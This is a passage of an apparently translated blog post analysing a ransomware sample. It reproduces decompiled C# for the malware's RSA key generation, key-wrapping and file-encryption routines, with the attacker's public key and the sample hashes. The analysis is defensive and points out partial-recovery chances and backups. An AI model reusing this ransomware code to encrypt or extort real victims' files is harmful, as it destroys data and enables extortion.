this.CF(str3); /// ... } } } } } catch { } } } } Focus on the main functions to understand the algorithm:
After initializing and creating an invisible window, we get into the init () function
private void Init() { this.Prep(); this.SaveNotes(); this.GetDrives(); this.NetScan(); this.SetDesktopWallpaper(); } Prep () - initializes variables, decrypts strings, creates crypto-providers, deletes shadow copies of files.
At the end of the function, the most interesting:
RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); this.privateKey = this.CryptKey(provider.ToXmlString(true)); Creates a class RSACryptoServiceProvider with a key length of 2048 . When creating a class, random values of encryption keys are created. The public key is stored in the variable this.publicKey , and in the variable this.privateKey are placed public and private keys, but encrypted with the public key that is stored in the variable this.pbK , as seen in the CryptKey function (string s) .
Public key:
<RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> CryptKey () function
private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } The SaveNotes () procedure saves the encrypted keys to the file “ssda.far” - this file must be sent to the attacker, he decrypts it with the help of the private key, which he has only. Having a private key can easily decrypt files.
Procedure GetDrives () and NetScan () - gets a list of directories.
Procedure SetDesktopWallpaper () - in theory should change the background image on the desktop, but does not work. As a result of infection, the background image has not changed.
If you look directly at the encryption procedure, you can see that not the entire file is encrypted, but only 3 iterations of 512 bytes are done. If there is important information in the file, and the file is large, then perhaps there is a chance to recover part of the file. Small files are not encrypted and the extension does not change.
File Encryption Procedure
private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } Expansion of encrypted files is a random value, and it is probably necessary for the subsequent decryption according to the mask, and in order to distinguish the infected machines from one another.
findings
Unfortunately, without a private key, it is almost impossible to decrypt files. Be sure to make copies of important information on external media, which must be disconnected from the computer.
ZY I apologize for a rather spontaneous analysis. I decided to write this post, can someone come in handy. I think the source code will help to see the whole work of the malicious program more clearly.
ZY.ZYY: Added hashes:
Archive: act of reconciliation № 317 formed 1 09112017.rar
SHA-256: 1c3fc2fec4c383070c8c83d94173a1966aeeb140f3684188342e283b652e6197
MD5: 68904e1cc81e7f367a677c54fcea7422
SHA-1: 5d39c694e01a9bf3b10519ba81a8565a0ee40b7b
Archived: act of reconciliation №317 formed 1 09112017.wsf
SHA-256: 02f0b00bbd9a633a98315560490627a5f907266101a881fa076ec2480df53d91
MD5: b698f6cbf69a85c7185e1caf8356f275
SHA-1: dd8122e876bfe7e238642f43dfffd7a4c3e54af3
eselp3.ax
SHA-256: b4f132e2625a788f2e8797495abe7e151a3242825752f62066c3ad2b4949b333
MD5: 980e8beac4c1538e68b2e80d5cd2bb23
SHA-1: 2f46d98b8c601104de4cc5afea146ef1682fc3a7
eselp4.ax
SHA-256: b6e8d5bd9cae7bd2b3ea87fe3483050e3c644d795df77d7f45a1a435375e8f5c
MD5: efea82173e5e09956ea5c7dbdb551297
SHA-1: 6ff4c69de879f3d40be9b5710e2a7245dba1352b
Source: https://habr.com/ru/post/342574/
All Articles